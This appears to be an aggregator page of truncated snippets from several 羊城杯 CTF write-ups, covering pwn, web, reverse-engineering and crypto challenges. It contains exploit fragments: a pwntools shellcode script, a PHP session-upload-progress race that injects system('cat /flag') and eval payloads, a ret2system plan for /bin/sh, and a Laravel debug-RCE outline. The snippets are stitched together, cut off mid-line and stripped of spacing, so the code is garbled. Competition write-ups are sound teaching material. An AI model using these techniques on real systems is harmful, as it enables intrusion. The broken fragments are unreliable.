p=process('./pwn')#p=process(["seccomp-tools","dump","./pwn"])#p = remote('tcp.cloud.dasctf.com',29043)elf = ELF('./pwn') libc= ELF('./libc.so.6')defdbg(): gdb.attach(p) pause() p.sendafter('(ye / no)\n','\x0f\x05') payload1=asm('''push rbx pop rdi pop ...
main函数 trace函数可以发现有漏洞,可以覆盖到src中的内容,和后面的攻击有关 warn函数 注意此处把exception指向了src exception=__cxa_allocate_exception(8uLL);*exception=src;__cxa_throw(exception,(structtype_info*)&`typeinfofor'char*,0LL); backdoor函数,这里的rax正好就是存exception指针的寄存器,也就是...
resp.set_cookie("user", value, max_age=3600)returnrespelifnotisinstance(value, basestring):raiseTypeError('Secret key missing for non-string Cookie.')iflen(value) >4096:raiseValueError('Cookie value to long.')deftouni(s, enc='utf8', err='strict'):returns.decode(enc, err)ifisinstance(s...
import io import requests import threading sessid = 'TGAO' data = {"cmd":"system('cat /flag');"} def write(session): whileTrue: f = io.BytesIO(b'a' * 1024 * 50) resp = session.post( 'http://192.168.41.68:8000/index.php', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval(...
羊城杯部分逆向wp 本文为看雪论坛优秀文章 看雪论坛作者ID:s1lenc3沉默 babysmc 有一个smc: 没发现反调试,直接调试解smc,调试直接跳过了一大串代码,来到关键处。 类似base64,不过加了个异或。写脚本解密: import base64 base_table = [ 0xE4, 0xC4, 0xE7, 0xC7, 0xE6, 0xC6, 0xE1, 0xC1, 0xE0, ...
羊城杯部分题目wp_by924-tEam com 解线性方程组 代码语言:javascript 代码运行次数:0 运行 AI代码解释 from sage.allimport*f=open('./data','r')lines=f.readlines()tempMatrix=[]print(lines)foriinrange(len(lines)):temp=lines[i][:-1].split()tempMatrix.append([int(i)foriintemp])print(len(...
[WP]2021羊城杯-Web部分 写在前面 这次拿了第一还是比较开心的,一晚上没睡觉… Web Cross The Side 版本信息Laravel v8.26.1 (PHP v7.4.15) 目录扫描 应该是开启了redis 联系版本号,尝试debug-rce 既然有file_get_contents与file_put_contents,尝试ftp passivemode 成功出网了...
羊城杯wp,1PWN1、Babyrop栈溢出,且存在后门函数;利用func1将'/cin/sh'修改为'/bin/sh',利用func2调用参数执行system('/bin/sh')即可#!usr/bin/envpython#-*-coding:utf8-*-frompwnimport*#p=process("./BabyRop")p=remote("192.168.39.
2022羊城杯WP-Web Web rce_me 这个题按理来说以为滤了_所以之前陆师傅文中刚提出的项目里面的字符构造应该是还不能满足的,因为缺了个没有下划线的而构造的4,问题就出在IEC_P271(自己构造过的师傅应该是知道怎么回事的),所以我们需要找一个新的4的构造方法或者替代4的其他可用字符 ...
羊城杯CTF 题目wp 01 Crypto easyrsa 题目 fromflagimportflagfromCrypto.Util.numberimport*m = bytes_to_long(flag)e =65537f = open("output.txt","r")a = f.readlines()foriina:n = int(i)c = pow(m, e, n)m = cprint'c = %s'% (m)f.close()'''c = ...